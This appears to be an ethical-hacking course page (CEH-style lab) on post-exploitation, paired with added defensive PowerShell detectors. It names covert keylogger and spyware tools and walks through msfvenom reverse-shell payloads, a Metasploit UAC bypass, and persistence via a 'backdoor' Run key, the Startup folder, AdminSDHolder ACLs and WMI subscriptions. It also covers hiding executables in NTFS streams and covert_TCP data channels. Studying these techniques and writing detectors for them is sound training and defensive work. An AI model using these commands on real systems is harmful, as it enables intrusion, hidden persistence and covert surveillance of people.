# 3. Maintain Remote Access and Hide Malicious Activities

## <mark style="color:red;">1. User system Monitoring with PowerSpy</mark>

Keylogger software

{% embed url="<https://power-spy-software-lite.en.softonic.com/>" %}

## <mark style="color:red;">2. System Monitoring with Spytech spyagent</mark>

{% embed url="<https://www.spytech-web.com/spyagent.shtml>" %}

## 3. User System Monitoring and Surveillance using Spyrix

Spyrix facilitates covert remote monitoring of user activity in real time. It provides concealed surveillance via a secure web account: keystroke logging, monitoring of platforms such as Facebook, WhatsApp, Skype and email, screenshot capture, live viewing of screen and webcam feeds, and continuous recording of screen and webcam activity.

{% embed url="<https://www.spyrix.com/>" %}

## 4. Maintain Persistence by Modifying Registry Run Keys <a href="#task-2-maintain-persistence-by-modifying-registry-run-keys" id="task-2-maintain-persistence-by-modifying-registry-run-keys"></a>

The Run and RunOnce registry keys cause programs to run automatically each time a user logs in to the system. The command line stored as a value's data is limited to 260 characters. If an attacker finds a service tied to a registry key on which they hold full permissions, they can use it for persistence or privilege escalation.

We need two payloads: the first is used to gain access to the system, and the second is used to maintain persistence by adding it to the registry.

**1st payload**

```
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.1.13 lport=444 -f exe > /home/attacker/Desktop/Test.exe
```

**2nd Payload**

```
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.1.13 lport=4444 -f exe > /home/attacker/Desktop/registry.exe
```

Now, copy both payloads to the target system using any of the available methods.

Now, on Kali Linux, use the following commands to open a listener:

```
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.10.1.13
set lport 444
exploit
```

Now, run the first payload on the target. You will get the shell.

Type **getuid** and press **Enter** to display the current user ID. Next, we try to bypass the User Account Control (UAC) setting that blocks unrestricted access to the machine.

Type **background** and press **Enter**, to background the current session.

We will bypass Windows UAC protection via the SilentCleanup scheduled task in Windows Task Scheduler. It is available in Metasploit as the bypassuac\_silentcleanup module.

In the terminal window, type **use exploit/windows/local/bypassuac\_silentcleanup** and press **Enter**. Now, type **set session 1** and press **Enter**.

<figure><img src="/files/rhtHO2yOjZb6ubL4Jfrs" alt=""><figcaption></figcaption></figure>

To set the **LHOST** option, type **set LHOST 10.10.1.13** and press **Enter**. To set the **TARGET** option, type **set TARGET 0** and press **Enter** (here, 0 is simply the Exploit Target ID). Type **exploit** and press **Enter** to launch the exploit against the **Windows 11** machine.

<figure><img src="/files/NGetLD5H8An6iSwIqMsp" alt=""><figcaption></figcaption></figure>

Type **getsystem -t 1** and press **Enter** to elevate privileges. Now, type **getuid** and press **Enter**; the Meterpreter session is now running with SYSTEM privileges. Type **shell** and press **Enter** to start a command shell, then add the second payload to the Run key:

<figure><img src="/files/OnPdV81gC4AHjm4l8p5p" alt=""><figcaption></figcaption></figure>

```
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v backdoor /t REG_EXPAND_SZ /d "C:\Users\Admin\Downloads\registry.exe"
```

<figure><img src="/files/k0gARXKcnNZQZKXc3wWn" alt=""><figcaption></figcaption></figure>

Once the command has executed successfully, open another terminal window with root privileges and run **msfconsole**. In Metasploit, type **use exploit/multi/handler** and press **Enter**. Then type **set payload windows/meterpreter/reverse\_tcp**, **set lhost 10.10.1.13** and **set lport 4444**, pressing **Enter** after each. Finally, type **exploit** to start the handler.

Once the PC restarts, we will get the shell.

## <mark style="color:red;">5. Hide files using NTFS ADS Streams</mark>

Copy calc.exe from the System32 folder to your test folder. Now create a text file:

```
notepad readme.txt
```

<figure><img src="/files/GclLX9p5CcqbawGbzPCu" alt=""><figcaption></figcaption></figure>

You can type **dir** to check the file size.

<figure><img src="/files/cw2qhHnJ7coyGevf7jNl" alt=""><figcaption></figcaption></figure>

Now let's append calc.exe to readme.txt as an alternate data stream:

```
type calc.exe >readme.txt:calc.exe
```

<figure><img src="/files/4metdcSSvU1RWubGlrY6" alt=""><figcaption></figcaption></figure>

**The size does not change. Now create a link to the hidden stream:**

```
mklink backdoor.exe readme.txt:calc.exe
```

<figure><img src="/files/IXA0iWik2qBu6tEMduiZ" alt=""><figcaption></figcaption></figure>

Opening backdoor.exe runs the calculator hidden in the text file.

<figure><img src="/files/cutUvOxLfpG5fWH7VfnC" alt=""><figcaption></figcaption></figure>

List the hidden ADS streams:

```
dir /r
```

<figure><img src="/files/iTg92xBoPTq4dtIyPTzV" alt=""><figcaption></figcaption></figure>
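A defender-side check for this technique, added here as an example (not from the original page): it walks every file under a folder, lists alternate data streams other than the default `:$DATA` and the browser's `Zone.Identifier`, and flags streams that begin with the `MZ` header of an executable. It assumes Windows PowerShell 5.1 (`-Encoding Byte`) on an NTFS volume; the folder path is a placeholder.

```powershell
function Find-SuspiciousAds {
    param(
        [Parameter(Mandatory)] [string] $Path,
        # ':$DATA' is the file's normal content; Zone.Identifier is the mark-of-the-web on downloads.
        [string[]] $IgnoreStreams = @(':$DATA', 'Zone.Identifier')
    )
    Get-ChildItem -LiteralPath $Path -File -Recurse -ErrorAction SilentlyContinue | ForEach-Object {
        $file = $_
        # -Stream * returns one record per stream (Stream name and Length), which plain dir hides.
        Get-Item -LiteralPath $file.FullName -Stream * -ErrorAction SilentlyContinue |
            Where-Object { $IgnoreStreams -notcontains $_.Stream } |
            ForEach-Object {
                # Read only the first two bytes of the stream: PE files begin with 'MZ' (0x4D 0x5A).
                $head = Get-Content -LiteralPath $file.FullName -Stream $_.Stream `
                            -Encoding Byte -TotalCount 2 -ErrorAction SilentlyContinue
                $isPe = (@($head).Count -eq 2 -and $head[0] -eq 0x4D -and $head[1] -eq 0x5A)
                [pscustomobject]@{
                    File        = $file.FullName
                    Stream      = $_.Stream
                    SizeBytes   = $_.Length
                    LooksLikePE = $isPe
                }
            }
    }
}

# Placeholder path; review the report before deleting anything.
Find-SuspiciousAds -Path 'C:\Users\Admin\Downloads' | Format-Table -AutoSize
```

A stream confirmed as unwanted can be removed with `Remove-Item -Path readme.txt -Stream calc.exe`, leaving the file's normal content intact.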

**Reference**

{% embed url="<https://cavementech.com/2022/05/mft-forensics.html#Alternate_Data_Streams_NTFS>" %}

### Appending Text File as ADS example

<figure><img src="/files/iyjEuVV0d2kTS5F1bY0T" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/LV2CBTxv0Ew54pJ1Zqim" alt=""><figcaption></figcaption></figure>

## <mark style="color:red;">6. Hide data using white space steganography</mark>

Conceal messages in ASCII text by appending whitespace to the ends of lines.

The **Snow** tool is used for this; it encodes data as runs of up to 7 spaces interspersed with tabs.

{% embed url="<https://darkside.com.au/snow/>" %}

Create a text file, then use the following command to hide the message in it:

```
SNOW.EXE -C -m "Hassan is my name" -p "magic" test.txt test2.txt
```

{% hint style="info" %}
-m is the message you want to hide

-p is the password

test.txt is the original file

test2.txt is the target file
{% endhint %}

<figure><img src="/files/L8ZfCqrBOhDmjU0NB8CD" alt=""><figcaption></figcaption></figure>

Opening test2.txt does not reveal the hidden data. However, if we open the file in Notepad and click Edit > Select All, the trailing spaces become visible.

<figure><img src="/files/7mjha8aJwgeq82JJyMtA" alt=""><figcaption></figcaption></figure>

To see the hidden message, use the following command.

```
SNOW.EXE -C -p "magic" test2.txt
```

<figure><img src="/files/cbrotSZ4BMPVodGjx35y" alt=""><figcaption></figcaption></figure>
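Because snow hides data only in trailing whitespace, a defender can detect it without knowing the password. The following function is an added example (not part of the original page) that scores a text file by the lines ending in spaces and tabs; it assumes Windows PowerShell 5.1 or later, and the sample file it writes is constructed.

```powershell
function Test-WhitespaceStego {
    param([Parameter(Mandatory)] [string] $Path)
    # -Raw keeps the exact bytes; splitting on line breaks ourselves preserves trailing whitespace.
    $text = Get-Content -LiteralPath $Path -Raw
    if (-not $text) { return $null }
    $lines = $text -split "`r?`n"
    $trailing = 0; $withTabs = 0; $wsChars = 0
    foreach ($line in $lines) {
        if ($line -match '([ \t]+)$') {
            $run = $Matches[1]
            $trailing++
            $wsChars += $run.Length
            # snow separates its space runs with tabs; editors rarely leave tab+space tails behind.
            if ($run.Contains("`t")) { $withTabs++ }
        }
    }
    [pscustomobject]@{
        File            = $Path
        Lines           = $lines.Count
        TrailingWsLines = $trailing
        TabSpaceLines   = $withTabs
        TrailingWsChars = $wsChars
        Suspicious      = ($withTabs -gt 0 -and $trailing -ge 2)
    }
}

# Constructed sample: two lines carry snow-style tab/space tails, one line is clean.
$sample = Join-Path $env:TEMP 'ws_sample.txt'
[IO.File]::WriteAllText($sample, "first line`t   `t      `r`nsecond line`r`nthird line`t `t     ")
Test-WhitespaceStego -Path $sample | Format-List
```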

## <mark style="color:red;">7. Image Steganography using OpenStego and Stegonline</mark>

### OpenStego

{% embed url="<https://www.openstego.com/>" %}

Select the message file and the cover file to hide the data in, then click Hide.

<figure><img src="/files/zxQSHpcNE34LXrMUo8Uq" alt=""><figcaption></figcaption></figure>

A new file will be created. It opens as an image but also contains our message. The tool extracts the data in the same way.

### Stegonline

{% embed url="<https://stegonline.georgeom.net/upload>" %}

Upload the file, choose the settings, and note them down (they are needed to extract the data).

<figure><img src="/files/W0h2JlnVtwCfoHv3k9f5" alt=""><figcaption></figcaption></figure>

Similarly, the data can be extracted from the image.

{% embed url="<https://youtu.be/aRHWfLrmZ8o?si=fBEGTvVS9FaA_110>" %}
Basic Image Steganography for Beginners
{% endembed %}

## <mark style="color:red;">8. Maintain Persistence Abusing Boot or Logon Autostart</mark>

After getting an admin Meterpreter session on the remote machine, change to the all-users startup folder:

```
cd "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp"
```

Check the working directory with **pwd**.

<figure><img src="/files/hPvjwUG2rLxHiF8DTYYc" alt=""><figcaption></figcaption></figure>

Now upload your msfvenom payload here.
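A defender-side audit covering both autostart locations this page uses, the Run/RunOnce keys from section 4 and the Startup folders from this section, added as an example (not from the original page). It lists every entry, resolves the executable, and flags anything unsigned or outside Program Files / Windows; it assumes Windows PowerShell 5.1 or later run as administrator so the HKLM keys can be read.

```powershell
function Get-AutostartAudit {
    $runKeys = 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
               'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
               'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
               'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
    $startupDirs = "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp",
                   "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
    $providerProps = 'PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider'
    $items = @(foreach ($key in $runKeys) {
        if (-not (Test-Path $key)) { continue }
        $props = Get-ItemProperty -Path $key
        # Every non-provider property of the key is one autostart value (name -> command line).
        foreach ($p in $props.PSObject.Properties) {
            if ($providerProps -notcontains $p.Name) {
                [pscustomobject]@{ Source = $key; Name = $p.Name; Command = [string]$p.Value }
            }
        }
    })
    $items += @(foreach ($dir in $startupDirs) {
        Get-ChildItem -LiteralPath $dir -File -ErrorAction SilentlyContinue |
            ForEach-Object { [pscustomobject]@{ Source = $dir; Name = $_.Name; Command = $_.FullName } }
    })
    foreach ($i in $items) {
        # Executable = quoted first token, else the first space-delimited token; REG_EXPAND_SZ is expanded.
        $exe = if ($i.Command -match '^"([^"]+)"') { $Matches[1] } else { ($i.Command -split ' ')[0] }
        $exe = [Environment]::ExpandEnvironmentVariables($exe)
        $signed = $false
        if (Test-Path -LiteralPath $exe) {
            $signed = (Get-AuthenticodeSignature -FilePath $exe).Status -eq 'Valid'
        }
        $trusted = ($exe -like "$env:ProgramFiles\*") -or ($exe -like "${env:ProgramFiles(x86)}\*") -or ($exe -like "$env:windir\*")
        [pscustomobject]@{
            Source     = $i.Source
            Name       = $i.Name
            Executable = $exe
            Signed     = $signed
            Suspicious = (-not $signed) -or (-not $trusted)
        }
    }
}

Get-AutostartAudit | Where-Object Suspicious | Format-Table -AutoSize
```

Run against the walkthrough's setup, the `backdoor` value pointing at an unsigned executable in a Downloads folder is reported on the first line.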

**Other tools**

{% embed url="<https://www.kali.org/tools/steghide/>" %}

{% embed url="<http://quickcrypto.com/free-steganography-software.html>" %}

## <mark style="color:red;">9. Maintain Domain Persistence Exploiting Active Directory Objects</mark>

AdminSDHolder is an Active Directory container whose default security permissions are used as a template for protected accounts and groups, such as Domain Admins and Enterprise Admins, to protect them from unintentional permission changes.

If a user account is added to the access control list of AdminSDHolder, the user acquires "GenericAll" permissions, which is equivalent to being a domain administrator.

After gaining the Meterpreter session, upload the PowerTools-master folder:

```
upload -r /home/attacker/Power-Tools-Master C:\\users\\Administrator\\Downloads
```

<figure><img src="/files/aZhFnf36SQ9wXVPLVlGB" alt=""><figcaption></figcaption></figure>

Now enter a shell and start PowerShell:

```
shell
powershell
```

Now change directory to the PowerTools folder and use the following commands to add the user Martin to the AdminSDHolder ACL:

```
import-Module ./powerview.psm1
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=system' -principalSamAccountName Martin -Verbose -Rights all
```

<figure><img src="/files/gJKLJ6377qRXkt9858dS" alt=""><figcaption></figcaption></figure>

To check the permissions, use the following command:

```
Get-ObjectAcl -SamAccountName "Martin" -ResolveGUIDs
```

<figure><img src="/files/nXWujlOEvhxf5pryeUiI" alt=""><figcaption></figcaption></figure>

<img src="/files/iKOFbL2mMabo0UD5Myee" alt="" data-size="original">

Now, to add the user to the Domain Admins group, use the following command:

```
net group "Domain Admins" Martin /add /domain
```

From PowerShell, we can use the following command to check the persistence:

```
dir \\192.168.10.18\C$
```

<figure><img src="/files/v4LdQ4ShDtJTgPomUtJz" alt=""><figcaption></figcaption></figure>
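The defensive counterpart, added here as an example rather than taken from the original page: it reads the AdminSDHolder ACL, reports principals holding GenericAll, WriteDacl or WriteOwner outside the default set, and lists objects SDProp has stamped with adminCount=1, so an added account like Martin stands out. It assumes the RSAT ActiveDirectory module on a domain-joined host; the expected-principal list is the default and should be tuned to the domain.

```powershell
Import-Module ActiveDirectory

function Get-AdminSDHolderAudit {
    $domain = Get-ADDomain
    $dn = "CN=AdminSDHolder,CN=System,$($domain.DistinguishedName)"
    # Principals that hold full control on AdminSDHolder by default; tune to your domain.
    $expected = 'NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators',
                "$($domain.NetBIOSName)\Domain Admins", "$($domain.NetBIOSName)\Enterprise Admins"
    $acl = Get-Acl -Path "AD:\$dn"
    $unexpected = $acl.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $_.ActiveDirectoryRights -match 'GenericAll|WriteDacl|WriteOwner' -and
        $expected -notcontains $_.IdentityReference.Value
    } | Select-Object IdentityReference, ActiveDirectoryRights, IsInherited
    # SDProp stamps adminCount=1 on protected objects and keeps their ACLs locked even after they
    # leave a privileged group, so stale entries here are worth a look as well.
    $protected = Get-ADObject -LDAPFilter '(&(adminCount=1)(|(objectClass=user)(objectClass=group)))' |
        Select-Object Name, ObjectClass
    [pscustomobject]@{
        AdminSDHolder      = $dn
        UnexpectedAces     = @($unexpected)
        ProtectedObjects   = @($protected)
        DomainAdminMembers = @((Get-ADGroupMember -Identity 'Domain Admins').SamAccountName)
    }
}

$audit = Get-AdminSDHolderAudit
$audit.UnexpectedAces | Format-Table -AutoSize
$audit.DomainAdminMembers
```

After the walkthrough's `Add-ObjectAcl` and `net group` steps, Martin appears both in UnexpectedAces and in DomainAdminMembers; removing only the group membership leaves the ACE in place, so both need cleaning up.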

## <mark style="color:red;">10. Privilege Escalation with WMI and Maintaining Persistence</mark>

WMI (Windows Management Instrumentation) event subscription can be used to install event filters, providers, and bindings that execute code when a defined event occurs. It enables system administrators to perform tasks locally and remotely.

{% embed url="<https://github.com/n0pe-sled/WMI-Persistence/blob/master/WMI-Persistence.ps1>" %}

Get a Meterpreter session and upload the script; have a second msfvenom payload ready as well.

Now, within Meterpreter, load the PowerShell extension:

```
load powershell
powershell_shell
```

<figure><img src="/files/Lv3CW79vxwmEyCIIiegR" alt=""><figcaption></figcaption></figure>

Now type the following commands to run the script:

```
Import-Module ./WMI-Persistence.ps1
install-Persistence -Trigger Startup -Payload "C:\users\administrators\downloads\exploit.exe"
```

Now listen with multi/handler in msf. Within 5-10 minutes, you will get an admin shell.
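A defender can enumerate exactly what such a script installs, because permanent subscriptions live in the root\subscription namespace. The function below is an added example (not from the original page or from the script's author) that pairs each __FilterToConsumerBinding with its filter query and consumer command; it assumes Windows PowerShell 5.1 or later run as administrator.

```powershell
function Get-WmiSubscriptionAudit {
    $ns = 'root\subscription'
    $filters   = Get-WmiObject -Namespace $ns -Class __EventFilter
    $consumers = Get-WmiObject -Namespace $ns -Class __EventConsumer
    $bindings  = Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding
    foreach ($b in $bindings) {
        # Binding references look like __EventFilter.Name="X"; the quoted part is the name.
        $fName = ($b.Filter -split '"')[1]
        $cName = ($b.Consumer -split '"')[1]
        $f = $filters   | Where-Object { $_.Name -eq $fName }
        $c = $consumers | Where-Object { $_.Name -eq $cName }
        # CommandLineEventConsumer runs a command line; ActiveScriptEventConsumer runs script text.
        $action = '<no command>'
        if ($c.CommandLineTemplate) { $action = $c.CommandLineTemplate }
        elseif ($c.ScriptText)      { $action = $c.ScriptText }
        [pscustomobject]@{
            Filter     = $fName
            Query      = $f.Query
            Consumer   = $cName
            Type       = $c.__CLASS
            Action     = $action
            # Any filter wired to a command or script consumer on a workstation deserves review.
            Suspicious = ($c.__CLASS -in 'CommandLineEventConsumer', 'ActiveScriptEventConsumer')
        }
    }
}

Get-WmiSubscriptionAudit | Format-List
```

On a clean workstation the namespace is normally empty apart from Microsoft's own SCM event filter, so an entry whose Action points at a user-writable path such as a Downloads folder is the thing to chase.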

## <mark style="color:red;">11. Covert channels using covert\_TCP</mark>

Networks use network access control permissions to permit or deny the traffic flowing through them. Tunneling is used to bypass the access control rules of firewalls, IDS, IPS, and web proxies to allow certain traffic. Covert channels can be created by inserting data into the unused fields of protocol headers. There are many unused or misused fields in TCP or IP over which data can be sent to bypass firewalls. The Covert\_TCP program manipulates the TCP/IP header of the data packets to send a file one byte at a time from any host to a destination. It can act like a server as well as a client and can be used to hide the data transmitted inside an IP header. This is useful when bypassing firewalls and sending data with legitimate-looking packets that contain no data for sniffers to analyze. A professional ethical hacker or pen tester must understand how to carry covert traffic inside the unused fields of TCP and IP headers.

**Sending Machine**

Download the tool on your sending machine

```
wget https://raw.githubusercontent.com/cudeso/security-tools/master/networktools/covert/covert_tcp.c
```

<figure><img src="/files/2FJ73fkM4uorH8b5ZtvC" alt=""><figcaption></figcaption></figure>

Now compile it.

```
sudo apt install gcc
cc -o covert_tcp covert_tcp.c
```

<figure><img src="/files/xNvSDU5NcLrwESs35TED" alt=""><figcaption></figcaption></figure>

**2nd Machine**

Compile the tool there as well. Then open a tcpdump listener:

```
sudo su
tcpdump -nvvX port 8888 -i lo   # optional: nothing is captured on the loopback interface in this setup
```

Start the covert\_tcp receiver in server mode:

```
sudo ./covert_tcp -dest 192.168.18.144 -source 192.168.18.95 -source_port 8888 -dest_port 9999 -server -file /home/user/msg1.txt
```

<figure><img src="/files/ySzJrIwv6pyZ0PfKe4p2" alt=""><figcaption></figcaption></figure>

Now, from the sending machine, send the message:

```
sudo ./covert_tcp -dest 192.168.18.144 -source 192.168.18.95 -source_port 9999 -dest_port 8888 -file /home/kali/msg.txt
```

<figure><img src="/files/lYvWVSctIIGwzPayWgyE" alt=""><figcaption></figcaption></figure>

We will also get the text file in the same folder on the receiving machine.

<figure><img src="/files/rTwBjmzikSzM9KEvB8pb" alt=""><figcaption></figcaption></figure>
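The one-byte-per-packet encoding is also the channel's weakness on the wire: the header field carrying the data takes only values in the printable ASCII range. The function below is an added example (not from the original page or from the covert\_tcp author) that scans tcpdump -nvv output for a flow whose IP identification values are all printable. It assumes covert\_tcp's default IP-ID mode and that the on-wire ID value equals the carried byte; the capture lines are constructed.

```powershell
function Find-IpIdCovertChannel {
    param([Parameter(Mandatory)] [string[]] $CaptureLines, [int] $MinPackets = 4)
    $flows = @{}; $pendingId = $null
    foreach ($line in $CaptureLines) {
        # tcpdump -vv prints the IP header line (with 'id N') before the endpoint line.
        if ($line -match '\bid (\d+),') { $pendingId = [int]$Matches[1]; continue }
        if ($null -ne $pendingId -and $line -match '^\s*(\S+) > (\S+?):') {
            $key = "$($Matches[1]) > $($Matches[2])"
            if (-not $flows.ContainsKey($key)) { $flows[$key] = New-Object 'System.Collections.Generic.List[int]' }
            $flows[$key].Add($pendingId)
            $pendingId = $null
        }
    }
    foreach ($key in $flows.Keys) {
        $ids = $flows[$key]
        if ($ids.Count -lt $MinPackets) { continue }
        # Normal stacks use incrementing or random 16-bit IDs; a run confined to 32..126 is the tell.
        $printable = @($ids | Where-Object { $_ -ge 32 -and $_ -le 126 }).Count
        $suspicious = ($printable -eq $ids.Count)
        $decoded = if ($suspicious) { -join ($ids | ForEach-Object { [char]$_ }) } else { '' }
        [pscustomobject]@{ Flow = $key; Packets = $ids.Count; PrintableIds = $printable
                           Suspicious = $suspicious; Decoded = $decoded }
    }
}

# Constructed capture: four SYNs whose IDs spell "Hi!!" plus one ordinary packet on another flow.
$sample = foreach ($id in 72, 105, 33, 33) {
    "IP (tos 0x0, ttl 64, id $id, offset 0, flags [none], proto TCP (6), length 40)"
    '    192.168.18.95.9999 > 192.168.18.144.8888: Flags [S], seq 0, win 512, length 0'
}
$sample += 'IP (tos 0x0, ttl 64, id 51234, offset 0, flags [DF], proto TCP (6), length 60)',
           '    192.168.18.95.44321 > 192.168.18.144.22: Flags [S], seq 1, win 64240, length 0'
Find-IpIdCovertChannel -CaptureLines $sample -MinPackets 1 | Format-Table -AutoSize
```

The 9999 > 8888 flow is reported as Suspicious with Decoded "Hi!!", while the port 22 flow with a random-looking ID is not; on a real capture keep the default MinPackets to avoid flagging short legitimate flows.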

{% embed url="<https://youtu.be/GjpaWNGfD-8>" %}
Covert Communication
{% endembed %}

{% embed url="<https://www.udemy.com/course/ethical-hacker-practical/?referralCode=289CF01CF51246BCAD6C>" %}
CEH V13 full course
{% endembed %}


